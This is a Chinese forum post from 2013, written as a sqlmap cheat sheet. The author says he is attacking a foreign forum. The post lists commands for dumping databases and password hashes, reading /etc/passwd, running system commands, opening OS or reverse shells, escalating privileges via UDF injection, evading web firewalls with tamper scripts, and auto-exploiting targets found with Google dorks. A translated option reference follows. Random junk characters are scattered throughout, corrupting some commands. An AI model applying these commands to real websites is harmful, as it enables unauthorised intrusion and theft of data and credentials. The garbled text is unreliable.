今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、! o/ S; C9 L @+ I& S
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
2 H( f y: P0 }' R4 }! `sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
5 O" ~7 P& l6 F, Y& H5 @$ ^7 Osqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
# z0 G5 A* ]( B/ ~7 f3 i 2 s w# I9 U. U* g9 p
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
& p9 m8 Y5 [- F, m7 F: b0 #获取字段内容
8 a2 W* ^: J4 M) Q, S7 l: |0 z
; ]; x# A3 m, R) B1 X; g******************信息获取******************6 o* m5 O- @' r/ e; P
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
4 G- V9 v% U/ }5 e. z* gsqlmap -u “http://url/news?id=1″ –users #列数据库用户! o5 H$ V: D- V
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
1 y. t3 ?' j* h4 Osqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码, v, @* r s/ h: j; w
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码: Y4 C$ p( d! J0 w# [0 J: _
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
7 Y8 _, a" z* a2 t–start 1 –stop 20 #列出指定字段,列出20 条# O, y$ J0 N/ h' }! Q
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表; ?$ T9 U3 u9 g3 ~" U8 A/ s4 m
sqlmap -u “http://url/news?id=1″ –privileges #查看权限) Y. b4 e3 ^0 ^% ~/ }% z
sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色0 q8 L8 r/ y4 Z( r% ^ u6 O) }
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
4 x1 e& J0 R0 @) \0 t C# [* ^sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表/ ?/ ~ _+ H- Z* k- h2 Z
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
" c. n, A8 A+ A) _; q! P; ]. a( S9 n8 Ysqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
2 Y/ J8 V# ?; ~' q4 t5 H) F7 I ^ gsqlmap -u “http://url/news?id=1″-b #获取banner信息$ [6 }4 U3 u6 R+ O% @
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
# J0 j; o- k4 M* ]sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型. r) n" ?. z" ]# W: f3 I2 C2 u
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入3 n4 a% y" @4 z2 P q6 V' L
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词" Y$ \4 ]5 I$ M5 g
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
! M: w: L) l, [sqlmap -u “http://url/news?id=1″ –file /etc/passwd
% N2 l# s9 Z3 f5 `2 y0 qsqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
+ L6 ?0 o( _2 y# Dsqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell* v5 m: n0 ]4 m9 U3 X1 M& |
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
8 a+ X& W1 b9 J' V8 N! f8 bsqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度" f' I/ p$ f: z- z+ h
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度/ `- z! }7 ^, a- D l5 {8 j
***********高级用法************* M! a6 D, q: R+ K# o7 _! L
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入+ O$ u* |* {) {3 ?( y) x1 Z) w
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
. q5 P$ F# b9 ^' X$ b–technique 测试指定注入类型\使用的技术2 ^6 w/ x& b$ |' m. B9 m) \+ Q4 V
不加参数默认测试所有注入技术& `7 J+ F7 Q7 A: q9 c4 ?; S' M, U
• B: 基于布尔的SQL 盲注- Z+ S6 `! K' r( y2 f% e4 H8 \/ v8 L
• E: 基于显错sql 注入
$ K8 j$ L7 w0 ]$ g• U: 基于UNION 注入
* s1 B7 k" x/ x0 z z6 s- j• S: 叠层sql 注入0 c( x& m2 R+ Q5 m
• T: 基于时间盲注" y; ~ B% |! x+ N7 M& e# E! Z
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
5 X# R* D7 X a3 E6 R–tamper 插件所在目录5 L- [% V8 \3 O( Z/ i5 Q- {& m
\sqlmap-dev\tamper8 c& a; X" A$ F. H Z2 C# V" A, l
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
6 e3 s( k2 X8 P1 slevel 执行测试等级 攻击实例:
& D+ V% W e0 vSqlmap -u “http://url/news?id=1&Submit=Submit”
1 Y0 w# g: C" A* A–cookie=”PHPSESSID=41aa833e6d0d
, S* [2 n7 x, N) F28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user. g2 e2 P" j0 I0 p! U5 J4 }
–password6 T }, k& ?; b& u9 {- \! O
参考文档:http://sqlmap.sourceforge.net/doc/README.html
5 R0 @0 ~3 C1 k***********安装最新版本*************+ y) X. Y5 Y) a- `$ O( r4 e
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
2 R! o# v$ F1 Z- m# M4 X2 [sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev7 O0 {0 d, w& }2 ~+ Q. l
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件. I; X# B# i4 _0 h2 l
sudo vim /home/当前用户/.bashrc
: A0 J) B( m( W4 A. v#任意位置加上:
# }: d6 F" U9 n% e: Lalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
( L6 A& r& n7 x3 a, a, Z! @如果想对所有用户有效 可设置全局 编辑下面的文件4 U$ t0 ?' e" S! ?) e# N
vim /etc/profile
7 a' W, `/ F0 j$ p5 l: m同样加上:, X I- j; C2 y$ w) ~, i
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
2 H. Q2 x3 q4 W* h9 c******************windows 7 (x64) sqlmap install (SVN)************- }+ [' m% r+ T/ N. F7 g3 ?
http://www.python.org/getit/ 安装python
4 Z* o& b6 ]0 ]' B. z8 Ehttp://www.sliksvn.com/en/download 安装windows svn client' y# K( Q9 u. }' ^* k8 W8 G
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
' _5 b9 B) R9 D" I) t: g; T# l5 F1 ]安装sqlmap0 a, S( Y0 A0 B# B% k" k/ b" K0 @' V
*修改环境变量8 W$ R( F0 {5 A, V1 @
–version 显示程序的版本号并退出4 d" N$ o: U' o L; k3 b) f& ~* {
-h, –help 显示此帮助消息并退出6 I7 W) ?5 J) ~6 ^. y/ w
-v VERBOSE 详细级别:0-6(默认为1)
# |+ K- t, E/ P7 g$ [) z" z; MTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。, |! v3 x' h) g! W& [1 D6 x; f# F
-d DIRECT 直接连接到数据库。
6 B& r8 | S& |-u URL, –url=URL 目标URL。
2 [- I& _6 [- ]3 Q& e) O Y-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
( B6 E+ z4 l+ [0 ^) W-r REQUESTFILE 从一个文件中载入HTTP 请求。
6 y0 v# l6 D d8 v4 h! P% b) `-g GOOGLEDORK 处理Google dork 的结果作为目标URL。* C, ^. z5 ^: Y$ } g
-c CONFIGFILE 从INI 配置文件中加载选项。$ y0 Q o" F0 i) o+ V
Request(请求)::
; i# A7 V( T+ i: b7 F, d8 z! {这些选项可以用来指定如何连接到目标URL。3 G$ L. Q+ S0 ?* g U
–data=DATA 通过POST 发送的数据字符串& S, g8 S4 i) l
–cookie=COOKIE HTTP Cookie 头- ~- X7 v- d; G0 r8 z
–cookie-urlencode URL 编码生成的cookie 注入 }8 C( ]$ z1 z3 m0 W
–drop-set-cookie 忽略响应的Set –Cookie 头信息9 X8 Z4 ?4 T1 k* ]
( @5 Y2 i+ M& W) |" G0 `" T# U–user-agent=AGENT 指定 HTTP User –Agent 头
8 _- ~; ?; i4 w( m2 P2 w2 Y7 u–random-agent 使用随机选定的HTTP User –Agent 头' I: V" e! s3 V( o; L& N, E- S
–referer=REFERER 指定 HTTP Referer 头# J) t, Z% U; S1 I$ @) I5 m
–headers=HEADERS 换行分开,加入其他的HTTP 头
! q- I0 s; N- \–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)1 N9 d5 C6 v4 `: ^- q( {2 ^! W
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
4 _/ j0 |) b& Z: x–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)7 d* J# F. {) h& f5 g P+ W' t# V
–proxy=PROXY 使用HTTP 代理连接到目标URL6 }% X7 q- e+ |. W5 c
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
" b- f9 \' P( s$ j: a) A& J; L–ignore-proxy 忽略系统默认的HTTP 代理8 v9 U: f7 E5 U6 A/ @
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
6 X5 Z% N, `' a6 }1 C–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
( Z) J$ H' M1 h8 l6 v/ B$ Y( u) X–retries=RETRIES 连接超时后重新连接的时间(默认3)
& B1 y& `) O/ J5 L–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
! ^) @: f P8 w- S" P7 {9 q–safe-url=SAFURL 在测试过程中经常访问的url 地址7 b5 h* I3 P: C
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL5 M( b( w! G3 n1 E2 G; f4 r( u
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
# u$ M, d9 _1 V-o 开启所有优化开关
( g: b# ?1 D0 h$ \7 {3 w8 `–predict-output 预测常见的查询输出) c$ Y3 S9 V0 Q' N" o( o3 N
–keep-alive 使用持久的HTTP(S)连接
7 D# j6 Y# @; H–null-connection 从没有实际的HTTP 响应体中检索页面长度
! w: a/ M: ]2 O9 [–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)" P+ M; H C. Q8 Q
Injection(注入):
* T. ^9 Q5 r. ^' l& B这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
2 G7 b& H1 `% V-p TESTPARAMETER 可测试的参数(S)
5 R5 F" O P. K9 w ^+ k- N–dbms=DBMS 强制后端的DBMS 为此值0 `9 T7 _' `. ~
–os=OS 强制后端的DBMS 操作系统为这个值8 L7 j' e S4 M( H. }: y% f, N
–prefix=PREFIX 注入payload 字符串前缀
, P9 F" _ z& N–suffix=SUFFIX 注入 payload 字符串后缀5 J9 n. g- @6 t; h- S y" t
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据2 e. [% ?6 B! h; g. [, r: ?
Detection(检测):
, A B2 l% m6 o1 o; J5 E这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。7 W R! R- ]' s& f
–level=LEVEL 执行测试的等级(1-5,默认为1)4 a% L/ F! E: d2 G
–risk=RISK 执行测试的风险(0-3,默认为1)
7 ^" B* v2 i# s7 ~2 E–string=STRING 查询时有效时在页面匹配字符串2 z8 y- l) {1 C' h
–regexp=REGEXP 查询时有效时在页面匹配正则表达式2 R) P2 C8 Z$ V c
–text-only 仅基于在文本内容比较网页
2 I: j! s& X1 m' l/ t" r; X5 i/ {- fTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。( b5 v9 y; F. D# R! @9 e' K
–technique=TECH SQL 注入技术测试(默认BEUST)
$ A1 n$ V1 `4 k5 m, B% C. k–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)7 ]2 G, j' l. i# s
–union-cols=UCOLS 定列范围用于测试UNION 查询注入- ?2 Y1 L/ f% U
–union-char=UCHAR 用于暴力猜解列数的字符1 u# S6 t1 T6 d
Fingerprint(指纹):6 { x, x! A2 v' p6 p
-f, –fingerprint 执行检查广泛的DBMS 版本指纹8 Q9 O0 E, r& O% o" h" |
Enumeration(枚举):+ ?8 b9 i1 l2 S) ~
! Y" g' B/ f2 A; H, n; D7 `这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。$ I7 ] C c% [6 Z
-b, –banner 检索数据库管理系统的标识* [3 `" u3 W8 H1 T; O
–current-user 检索数据库管理系统当前用户
+ H7 r8 B- C8 k. k! q–current-db 检索数据库管理系统当前数据库- P6 X8 f) {6 w+ b* d2 T
–is-dba 检测DBMS 当前用户是否DBA
' H$ f6 j0 D- t: g5 _' o–users 枚举数据库管理系统用户- c2 ? d1 q1 s0 ^4 [
–passwords 枚举数据库管理系统用户密码哈希$ S* ?) t* ]5 f* P
–privileges 枚举数据库管理系统用户的权限% I% o# J1 h, T! e
–roles 枚举数据库管理系统用户的角色! j7 l; w& d8 k9 B$ [
–dbs 枚举数据库管理系统数据库$ {/ [$ V. h* f5 a& j5 e4 ^
–tables 枚举的DBMS 数据库中的表
* h1 w L8 {1 K. b$ A3 E$ x7 y p8 ?–columns 枚举DBMS 数据库表列
( A' ~# Z' w7 x1 I–dump 转储数据库管理系统的数据库中的表项; v+ V# M/ x; E0 f1 }# y
–dump-all 转储所有的DBMS 数据库表中的条目8 G n$ s' u- S4 h+ \$ w% ^
–search 搜索列(S),表(S)和/或数据库名称(S)
- o+ V. J7 u+ t3 c8 q0 ~0 R-D DB 要进行枚举的数据库名
9 T% Q' i" g/ n0 f8 ^3 \-T TBL 要进行枚举的数据库表
- J" P, D3 ~& g0 b-C COL 要进行枚举的数据库列
) r; o$ \ V3 P# C* ?) K-U USER 用来进行枚举的数据库用户( B. ]: z/ L, R3 C0 T+ Z& {
–exclude-sysdbs 枚举表时排除系统数据库" \7 w h( _" R2 f' m" E
–start=LIMITSTART 第一个查询输出进入检索& ]7 K9 ~/ m. e5 u) b! }
–stop=LIMITSTOP 最后查询的输出进入检索
; x- N2 J$ @ I0 h$ `) H$ J0 S–first=FIRSTCHAR 第一个查询输出字的字符检索" ^ d) l9 e/ s7 H3 k/ B
–last=LASTCHAR 最后查询的输出字字符检索1 g. q5 t, o0 k8 {0 r0 B; `
–sql-query=QUERY 要执行的SQL 语句
" W! {9 ]0 r) d4 p3 D8 ^ l–sql-shell 提示交互式SQL 的shell1 n( C' w% ^ B1 _
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
. _* r% C- {4 r7 s–common-tables 检查存在共同表0 Y/ T5 J, x9 V' N0 q8 y# M, e' v F
–common-columns 检查存在共同列
* ]3 }* d6 q. ~3 d6 GUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。; s3 `. b! F8 o
–udf-inject 注入用户自定义函数
* L- } I. o& E0 C8 ?! E/ o/ _–shared-lib=SHLIB 共享库的本地路径
" V+ T* S+ w, v4 q) }8 u! I5 Q" IFile system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
- |! S ^9 }+ v% O/ U–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
3 z$ {1 M8 Y- H- B+ R–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 ~4 ~. Q8 f% N5 Z9 n
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
# z- A0 A; T& v$ x8 nOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。9 D) y! _5 A- T6 H0 H" \ T G
–os-cmd=OSCMD 执行操作系统命令! K1 G5 W7 f" z! G8 M
–os-shell 交互式的操作系统的shell/ q- \" w2 A9 d, a# j5 P" ?5 u
–os-pwn 获取一个OOB shell,meterpreter 或VNC
$ A- ]" \0 g+ L4 ^9 L: K–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC
& ?+ O9 A: O- {- `–os-bof 存储过程缓冲区溢出利用
3 {7 T, ]# p) \, Q–priv-esc 数据库进程用户权限提升
3 x4 A; P0 K: p2 O9 A–msf-path=MSFPATH Metasploit Framework 本地的安装路径2 N$ ^+ h( I% R9 M1 y5 _6 ~; N ^
–tmp-path=TMPPATH 远程临时文件目录的绝对路径7 |6 c+ d# [: E# ~1 O0 i$ t: ?5 P+ G
: \/ _# m1 I4 c3 t) |Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。$ ]2 n2 [$ \; }
–reg-read 读一个Windows 注册表项值2 m2 @ D% G0 e6 t+ c( u6 C, W$ k
–reg-add 写一个Windows 注册表项值数据
, P- H! \8 Z7 }–reg-del 删除Windows 注册表键值8 ?: A) q& {. k
–reg-key=REGKEY Windows 注册表键$ t6 t2 T0 D8 \) V6 f; ~- j
–reg-value=REGVAL Windows 注册表项值
; ?: x& @9 P% e8 A–reg-data=REGDATA Windows 注册表键值数据$ i6 Z2 F$ o- P5 }
–reg-type=REGTYPE Windows 注册表项值类型: u4 X" R, @) T+ c
General(一般): 这些选项可以用来设置一些一般的工作参数。
6 p( l% E8 w! ~4 B7 w-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中) t& I6 M1 V- y2 m( z7 X2 n$ D5 C, s0 Q
-s SESSIONFILE 保存和恢复检索会话文件的所有数据4 m; C: z6 n ]4 E3 a
–flush-session 刷新当前目标的会话文件
, ?5 V5 s& ]/ O# b) {0 l–fresh-queries 忽略在会话文件中存储的查询结果 G8 |/ r& b# D
–eta 显示每个输出的预计到达时间+ A; Y& Y0 X x! b
–update 更新SqlMap
2 m$ w6 E& q% ?7 v( U$ k6 }6 R$ x$ }% h–save file 保存选项到INI 配置文件
+ d8 Q2 c- _2 F* \4 ?–batch 从不询问用户输入,使用所有默认配置。
2 S: x% I* G6 ^9 ~0 Z! A" Y* KMiscellaneous(杂项):1 @. D0 S3 e. V h
–beep 发现SQL 注入时提醒! _! \) C0 P: A) t5 x1 n6 o, I
–check-payload IDS 对注入payloads 的检测测试
, ^: [3 c; x8 x( T" N+ {–cleanup SqlMap 具体的UDF 和表清理DBMS
' Y" o/ F: }7 @" b–forms 对目标URL 的解析和测试形式
{. w6 x% S, \–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果9 A3 {8 \# ]0 X
–page-rank Google dork 结果显示网页排名(PR)7 A4 B1 O! B! t8 F) V
–parse-errors 从响应页面解析数据库管理系统的错误消息
- ?/ B* a$ U1 O- A% q3 G& j+ p–replicate 复制转储的数据到一个sqlite3 数据库
& c6 x9 z3 ^& R8 f5 `& ~; S1 T–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
0 ?& F+ }4 [1 m% Z5 ~/ \5 S–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对